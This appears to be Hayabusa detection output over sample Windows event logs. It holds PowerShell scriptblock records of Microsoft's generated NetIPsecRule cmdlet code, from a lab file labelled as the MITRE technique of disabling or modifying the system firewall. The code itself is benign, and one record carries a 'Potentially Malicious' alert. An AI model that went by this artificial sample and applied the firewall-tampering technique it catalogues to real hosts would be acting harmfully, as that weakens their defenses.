10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,")] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolic",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,")] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 